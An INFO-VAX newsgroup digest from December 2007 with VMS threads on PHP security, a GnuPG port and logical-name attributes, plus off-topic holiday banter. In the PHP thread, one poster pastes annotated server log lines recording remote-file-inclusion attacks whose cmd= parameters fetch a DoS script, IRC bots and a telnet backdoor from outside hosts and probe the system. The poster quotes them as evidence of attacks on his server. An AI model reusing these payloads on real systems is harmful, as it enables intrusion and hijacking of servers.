INFO-VAX Tue, 25 Dec 2007 Volume 2007 : Issue 705 Contents: Re: Compiling PHP and/or any PHP Extension on VMS Re: Compiling PHP and/or any PHP Extension on VMS Re: Compiling PHP and/or any PHP Extension on VMS GnuPG 1.4.8 for VMS Re: HP to close Nashua (ZKO) Re: OT: Merry Christmas to c.o.v. ! Re: OT: Merry Christmas to c.o.v. ! Re: Volume label. Re: Volume label. Re: Volume label. Re: Volume label. Re: Volume label. Re: Volume label. ---------------------------------------------------------------------- Date: 24 Dec 2007 19:59:26 GMT From: billg999@cs.uofs.edu (Bill Gunshannon) Subject: Re: Compiling PHP and/or any PHP Extension on VMS Message-ID: <5tahcuF1b2pnaU1@mid.individual.net> In article <476fe258$0$90273$14726298@news.sunsite.dk>, Arne Vajhøj writes: > Bill Gunshannon wrote: >> In article <476ee6ba$0$90263$14726298@news.sunsite.dk>, >> Arne Vajhøj writes: >>> Bill Gunshannon wrote: >>>> In article <476ed316$0$90273$14726298@news.sunsite.dk>, >>>> Arne Vajhøj writes: >>>>> Bugs in PHP itself are relative rare. Bugs in apps written in PHP are >>>>> relative common. >>>> It isn't just bugs. It is a language iwho's interface is designed to >>>> let outsiders execute any command available on the system any time they >>>> want to by merely adding it to the URL sent to the PHP script. >>> ???? >>> >>> It should save it in $_REQUEST, $_GET and $_SERVER but >>> not execute it. >> >> Yeah, that would be nice, but reality is somewhat different. > > Do you have a reference. It sounds rather impossible to me. The net is covered with security alerts about PHP. How about if I just show you the kinds of things they have tried on my server? ------------------ httpd-access2.log:200.215.111.144 - - [29/Mar/2005:14:50:23 -0500] "GET /~cmps/template.php?body=http://www.bsmoney.com/BoSS.txt?&cmd=cd%20/tmp;fetch%20http://packetstormsecurity.nl/DoS/udp.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" ** This one is trying to download a UDP based DOS attack written in Perl to the /tmp directory. Where it will then be used to attack some other from an "innocent" server. httpd-access2.log:200.151.236.187 - - [07/Jun/2004:18:47:39 -0400] "GET /~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=cd%20/tmp%20;%20fetch%20http://www.psychoid.lam3rz.de/psyBNC2.3.1.tar.gz HTTP/1.1" 200 5915 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" ** This one is downloading an IRC BOT. I will leave it to you to figure out why. I stopped using IRC over a decade ago, httpd-access.log:200.151.83.14 - - [20/May/2004:12:59:42 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=cd%20/tmp%20;%20wget%20http://members.lycos.co.uk/xnelson/bnc.pl" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" ** Same thing written in Perl. httpd-access.log:200.151.83.14 - - [20/May/2004:13:05:43 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=netstat%20-an" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;DigExt)" ** This one is running netstat, probably just fishing for addresses of local machines or maybe just trying to see if the PHP exploit works. httpd-access.log:80.178.183.122 - - [20/May/2004:17:46:12 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" ** This one is trying to see what user PHP scripts run as. httpd-access.log:200.151.83.14 - - [20/May/2004:13:07:58 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=ps%20x" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" ** This one is looking for what processes are running. Maybe to see if the exploit worked? httpd-access.log:80.178.183.122 - - [20/May/2004:17:46:22 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" ** This one is probing for info on system type. httpd-access.log:80.178.183.122 - - [20/May/2004:17:49:08 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=cd%20/tmp;pwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" ** This one seems to be testing wether or not changing directories worked. httpd-access.log:80.178.183.122 - - [20/May/2004:17:49:15 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=cd%20/tmp;wget%20talesrenan.vila.bol.com.br/telnetd" "Mozilla/4.0 (compatible;MSIE 6.0; Windows NT 5.1)" ** And this one is trying to use "wget" to download a telnet daemon that probably bypasses the password part of the login. --------------------- > > Maybe except if PHP is run as CGI on an OS that supports multiple > statements in a command line - or something like that. I imagine the biggest use for PHP is as CGI and the "cmd=" is apparently normal URL syntax. What it does is a function of PHP. I can not think of any good, legitimate reason to allow this. > >>>> Perl and PHP are the antithesis of software engineering. >>> They are not like the classic programming languages with declarations >>> of data types etc.. >> >> They are, by design, for "quick and dirty" programming. > > Web programming often fits that description very well. And you don't see a problem with that? bill -- Bill Gunshannon | de-moc-ra-cy (di mok' ra see) n. Three wolves bill@cs.scranton.edu | and a sheep voting on what's for dinner. University of Scranton | Scranton, Pennsylvania | #include ------------------------------ Date: Mon, 24 Dec 2007 15:29:37 -0500 From: JF Mezei Subject: Re: Compiling PHP and/or any PHP Extension on VMS Message-ID: <47701707$0$4349$c3e8da3@news.astraweb.com> Bill Gunshannon wrote: >>> They are, by design, for "quick and dirty" programming. >> >> Web programming often fits that description very well. > > And you don't see a problem with that? If you see a problem with that, it will prevent you from getting many jobs/contracts. You're not going to go very far at interviews when you start to torpedoe the technology chosen by star employee(s) in that company (and potentially the interviewer himself). In the end, pushing for web standard adherance hasn't gotten people far. Pushing for quality and security hasn't gotten VMS anywhere. It is a sad fact that the IT industry is made of sheep who religiously follow trends that are set out by trade rags. Giving people what they need doesn't work anymore. Giving them what they want works. One way to get a heard of sheep to move in a different direction is to bark at them. (at least that works for cyclists in new zealand). In the IT world, disturbing technologies (not sure if this is the actual expression) is what causes the heard to start moving. Large corporations like Bell Canada had gotten so brainwashed by Gates that they had allowed their web sites serving milions of people to actively block out non-Microsoft browsers. Then came Linux and Mozilla/Firefox, and the trade rags have talked those up quite a bit, and all of a sudden, those large corporatiosn awaken to the stupidity of their web sites and remove the code that prevented non MS users from accessing it. (I am not talking about html features not working, it was code that redirected non-MS users to a page telling them they couldn't access their web sites). Unfortunatly, the dozen of so people left in this newsgroup don't have the ability to influence the media and hence no ability to start/change trends. The only solution is to go with the flow and stop fighting. Resistance is futile. ------------------------------ Date: 24 Dec 2007 20:48:53 GMT From: billg999@cs.uofs.edu (Bill Gunshannon) Subject: Re: Compiling PHP and/or any PHP Extension on VMS Message-ID: <5tak9lF1ctvl6U1@mid.individual.net> In article <47701707$0$4349$c3e8da3@news.astraweb.com>, JF Mezei writes: > Bill Gunshannon wrote: > >>>> They are, by design, for "quick and dirty" programming. >>> >>> Web programming often fits that description very well. >> >> And you don't see a problem with that? > > > If you see a problem with that, it will prevent you from getting many > jobs/contracts. You're not going to go very far at interviews when you > start to torpedoe the technology chosen by star employee(s) in that > company (and potentially the interviewer himself). Well, JF, at my age that is probably not going to be much of a problem. There are enough jobs around that require my real skills without my having to prostitute myself and contribute to the problems that are rapidly destroying the INTERNET as a serious place to do business. > > In the end, pushing for web standard adherance hasn't gotten people far. > Pushing for quality and security hasn't gotten VMS anywhere. It is a sad > fact that the IT industry is made of sheep who religiously follow trends > that are set out by trade rags. > > Giving people what they need doesn't work anymore. Giving them what they > want works. Damn, your more cynical than even me. bill -- Bill Gunshannon | de-moc-ra-cy (di mok' ra see) n. Three wolves bill@cs.scranton.edu | and a sheep voting on what's for dinner. University of Scranton | Scranton, Pennsylvania | #include ------------------------------ Date: Mon, 24 Dec 2007 22:41:40 -0600 (CST) From: sms@antinode.org (Steven M. Schweda) Subject: GnuPG 1.4.8 for VMS Message-ID: <07122422414019_202647DE@antinode.org> Anyone interested in GnuPG 1.4.8 for VMS (or merely desperate for amusement) might wish to consider: http://antinode.org/dec/sw/gnupg.html No big new features, although there's a bit more tolerance for ODS2 file names. It's tested about as much as previous versions, which is to say, hardly, but complaints are always welcome. As before, if anyone is actually using this stuff, I'd like to hear about it. I see that HP has advanced to version 1.4.7 while I wasn't looking ("http://h71000.www7.hp.com/opensource/gnupg.html"), but if you think that you'd be entertained by an embarassingly lame build procedure, I heartily recommend the one supplied in that kit. (Hint: The comment which says "Alpha/VAX" is pretty serious. Of course, those IA64 systems are so fast that compiling everything with optimization is probably a waste of effort, anyway. It's easy to see why they didn't update their VAX kit, too. Sigh.) ------------------------------------------------------------------------ Steven M. Schweda sms@antinode-org 382 South Warwick Street (+1) 651-699-9818 Saint Paul MN 55105-2547 ------------------------------ Date: Mon, 24 Dec 2007 20:27:13 +0100 From: "Dr. Dweeb" Subject: Re: HP to close Nashua (ZKO) Message-ID: <47700811$0$21925$157c6196@dreader1.cybercity.dk> Phillip Helbig---remove CLOTHES to reply wrote: > In article <476ec059$0$21927$157c6196@dreader1.cybercity.dk>, "Dr. > Dweeb" writes: > >> I live in a country with the highest taxation on the planet. > > Denmark? netop! ------------------------------ Date: Mon, 24 Dec 2007 14:32:54 -0800 (PST) From: Neil Rieck Subject: Re: OT: Merry Christmas to c.o.v. ! Message-ID: On Dec 24, 8:41 am, billg...@cs.uofs.edu (Bill Gunshannon) wrote: > In article , > VAXman- @SendSpamHere.ORG writes: [...snip...] > > > so is James T. Kirk, but that doesn't stop people from discussing > him (even here!) like he was real. Kinda like the guys from NASA > that get involved in the "technical" discussions of warp drive > every once in a while. > Hey wait a minute. It's one thing to deny the existence of Jesus and Santa, but quite something else to deny the existence of James T Kirk. Like the poster says, "Everything I learned in life, I learned from Star Trek :-) Seek out new life an new civilizations Non-interference is the prime directive Keep your phaser set on stun Humans are highly illogical There's no such thing as a Vulcan death grip Live long and prosper Having is not so pleasing a thing as wanting; it is not logical, but it is often true Infinite diversity in infinite combinations (IDIC) Tribbles hate Klingons (and Klingons hate Tribbles) (editor's note: I guess that make me Klingon!) Enemies are often invisible - like Klingons, they can be cloaked Don't put all your ranking officers in one shuttle craft When your logic fails, trust a hunch Insufficient data does not compute If it can't be fixed, just ask Scotty Even in our own world, sometimes we are aliens When going out into the Universe, remember: "Boldly go where no man has gone before!" Neil Rieck Kitchener/Waterloo/Cambridge, Ontario, Canada. http://www3.sympatico.ca/n.rieck/ ------------------------------ Date: Mon, 24 Dec 2007 22:38:18 -0600 From: David J Dachtera Subject: Re: OT: Merry Christmas to c.o.v. ! Message-ID: <4770893A.DBDD6C96@spam.comcast.net> JF Mezei wrote: > > VAXman- @SendSpamHere.ORG wrote: > > Psst. JF, I hate to break this to you but that Santa character is a > > myth... like religion, he exists to fill some human flaw which seems > > to yearn for the belief in non-existing do-gooders. > > That is wrong. Santa even has an official postal code: H0H 0H0. > http://www.postescanada.ca/dec/santa/writesanta/default-e.asp > > Norad is currently tracking him. > > http://www.norad.mil/Home.html > (click on the Norad tracks Santa image on the left column of home page). > > And how dare you suggest, on this christmas eve that no children in the > world will be getting gifts from Santa if they behaved this year ? > > And unlike the lockness monster or sasquach, there are plenty of > pictures of Santa Claus all over the plane. > > Santa is an essential part that fuels kid's imaginations. Killing Santa > is just plan dead wrong, especially on the 24th of december. That is far > worse than asking a slightly plump lady if she is pregnant. Well, it happens often enough that some "slightly plump" "ladies" don't find out they're pregnant until they deliver - one made the news in this area about this time last month, as I recall. The "Santa Claus" character, as we in the U.S. know it, was the central figure in an advertising campaign run by the Coca Cola company back about a 100 years or so ago. It has since become part of Americana, indeed, part of the "world" of Christmas, following onto Father Christmas, the "real" Story of Saint Nicholas, and so on. "Rudolph" followed some time later, as I understand. David J Dachtera DJE Systems ------------------------------ Date: Mon, 24 Dec 2007 11:43:31 -0800 (PST) From: AEF Subject: Re: Volume label. Message-ID: <3f212454-ab83-4d30-8d8d-f3064dbce599@j64g2000hsj.googlegroups.com> On Dec 24, 9:55 am, hel...@astro.multiCLOTHESvax.de (Phillip Helbig--- remove CLOTHES to reply) wrote: > In article > <1384b006-7d60-4c3b-9dbc-0a0bc3254...@e6g2000prf.googlegroups.com>, AEF > > writes: > > > > > In this example, how would it stop the user from simply redefining the > > > > > application logical names? > > > > > If they are terminal, then if one points to DSA425, he can't define > > > > DSA425 himself. > > > > Or, rather, he can, but it wouldn't affect an application using a > > > logical name pointing to DSA425 and specified as TERMINAL. > > > But he could just redefine the logical name that points to DSA425: > > [something]. So you still need to ignore user and supervisor mode > > logical names. > > Yes, that's why I mentioned NOALIAS. That, of course, will also cover > the case above, so arguably TERMINAL isn't needed for this reason. (Was > TERMINAL, or its functional equivalent, introduced before NOALIAS? > Probably, since the leading _ goes way back.) > > Was the original function of TERMINAL to save CPU cycles by saving the > last translation attempt? I was trying to copy and paste a Google Groups thread here but for some reason the paste operation screws up the entire input field. So do this: Search for TERMINAL PURPOSE in comp.os.vms on Google Groups (groups.google.com/group/comp.os.vms) and read the first thread that pops up. Also, run a command like $ SHOW LOGICAL/FULL */TABLE=* and check out logical names like "LNM$STARTUP_TABLE" [exec,table] = "" [terminal] Since you can't reDEFINE "", I suppose this would support the saving- CPU-cycles theory. Also, I think it's just a precaution against a user or system mangler from redefining the device or logical name portions of equivalence names of important logical names. So I think it's both: saving CPU cycles and preventing the define-a- device-name-as-a-logical-name quick-and-dirty "fix" trick. AEF ------------------------------ Date: Mon, 24 Dec 2007 15:12:22 -0500 From: JF Mezei Subject: Re: Volume label. Message-ID: <477012e2$0$25359$c3e8da3@news.astraweb.com> AEF wrote: > So I think it's both: saving CPU cycles and preventing the define-a- > device-name-as-a-logical-name quick-and-dirty "fix" trick. consider the following: $DEFINE/qualifiers SYSUAF $11$DQA0:[shared]sysuaf.dat without a trans=terminal, someone could define a logical name $11$dqa0 to point to another drive (or one they created with the LDdriver). ------------------------------ Date: Mon, 24 Dec 2007 15:26:59 -0800 (PST) From: AEF Subject: Re: Volume label. Message-ID: <5c3db750-06ba-4919-a381-e2ab3c00b4a9@21g2000hsj.googlegroups.com> On Dec 24, 4:12 pm, JF Mezei wrote: > AEF wrote: > > So I think it's both: saving CPU cycles and preventing the define-a- > > device-name-as-a-logical-name quick-and-dirty "fix" trick. > > consider the following: > > $DEFINE/qualifiers SYSUAF $11$DQA0:[shared]sysuaf.dat > > without a trans=terminal, someone could define a logical name $11$dqa0 > to point to another drive (or one they created with the LDdriver). Nope. You have to do $ DEFINE $11$DQA0 /SYSTEM/EXECUTIVE_MODE ^^^^^^^^^^^^^^^ for this redirect to work. And if you can do that, well, you're already well on your way to being able to cause trouble, no? AEF ------------------------------ Date: Mon, 24 Dec 2007 16:09:52 -0800 (PST) From: AEF Subject: Re: Volume label. Message-ID: On Dec 24, 6:26 pm, AEF wrote: > On Dec 24, 4:12 pm, JF Mezei wrote: > > > AEF wrote: > > > So I think it's both: saving CPU cycles and preventing the define-a- > > > device-name-as-a-logical-name quick-and-dirty "fix" trick. > > > consider the following: > > > $DEFINE/qualifiers SYSUAF $11$DQA0:[shared]sysuaf.dat > > > without a trans=terminal, someone could define a logical name $11$dqa0 > > to point to another drive (or one they created with the LDdriver). > > Nope. You have to do > > $ DEFINE $11$DQA0 /SYSTEM/EXECUTIVE_MODE > ^^^^^^^^^^^^^^^ > > for this redirect to work. And if you can do that, well, you're > already well on your way to being able to cause trouble, no? > > AEF Hell, if you already have access to the SYSTEM logical name table, you're already well on your way to being able to cause trouble. Just *specifically* what are you concerned about? AEF ------------------------------ Date: Mon, 24 Dec 2007 22:21:18 -0600 From: David J Dachtera Subject: Re: Volume label. Message-ID: <4770853E.6A8EDFAA@spam.comcast.net> Phillip Helbig---remove CLOTHES to reply wrote: > > In article , helbig@astro.multiCLOTHESvax.de > (Phillip Helbig---remove CLOTHES to reply) writes: > > > In article > > <319ff94e-2a42-4f73-a808-5e533635b184@s48g2000hss.googlegroups.com>, AEF > > writes: > > > > > In this example, how would it stop the user from simply redefining the > > > application logical names? > > > > If they are terminal, then if one points to DSA425, he can't define > > DSA425 himself. > > Or, rather, he can, but it wouldn't affect an application using a > logical name pointing to DSA425 and specified as TERMINAL. If the LNM in question exists in a Group or System table, but is aliased in a Process or Job table, the alias can override, regardless of whether the "real" translation has the TERMINAL attribute. NO_ALIAS would be important here. David J Dachtera DJE Systems Remember that LNMs can also be search lists. ------------------------------ Date: Mon, 24 Dec 2007 22:27:52 -0600 From: David J Dachtera Subject: Re: Volume label. Message-ID: <477086C8.174D5E0A@spam.comcast.net> Phillip Helbig---remove CLOTHES to reply wrote: > > In article > <1384b006-7d60-4c3b-9dbc-0a0bc3254779@e6g2000prf.googlegroups.com>, AEF > writes: > > > > > > In this example, how would it stop the user from simply redefining the > > > > > application logical names? > > > > > > > If they are terminal, then if one points to DSA425, he can't define > > > > DSA425 himself. > > > > > > Or, rather, he can, but it wouldn't affect an application using a > > > logical name pointing to DSA425 and specified as TERMINAL. > > > > But he could just redefine the logical name that points to DSA425: > > [something]. So you still need to ignore user and supervisor mode > > logical names. > > Yes, that's why I mentioned NOALIAS. That, of course, will also cover > the case above, so arguably TERMINAL isn't needed for this reason. (Was > TERMINAL, or its functional equivalent, introduced before NOALIAS? Be careful about how you think of /TERMINAL. - /TERMINAL does NOT prevent the system form continuing to traverse a search list. - /NOALIAS means that a LNM can not be DEFINEd at a lower privilege level. For example: a LNM DEFINEd /EXEC cannot be aliased in either /SUPER or /USER. This is *NOT* the same as abandoning translation recursion for any element of a search list. David J Dachtera DJE Systems ------------------------------ End of INFO-VAX 2007.705 ************************